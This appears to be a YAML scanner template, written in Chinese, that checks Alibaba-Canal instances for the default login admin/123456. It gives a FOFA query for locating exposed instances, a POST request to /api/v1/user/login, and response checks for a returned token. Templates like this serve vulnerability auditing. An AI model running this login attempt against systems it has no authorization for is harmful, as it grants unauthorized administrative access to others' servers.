product: Alibaba-Canal
vName: Alibaba-Canal 默认口令
type: 默认口令/弱口令
vID: [ ]
level: 3
vDesc: Alibaba-Canal 存在默认口令admin/123456
version: ''
note: ''
search:
  FOFA: app="Alibaba-Canal"
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /api/v1/user/login
      json: { "username": "admin","password": "123456" }
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - '"code":20000'
              - data
              - token
            logic: and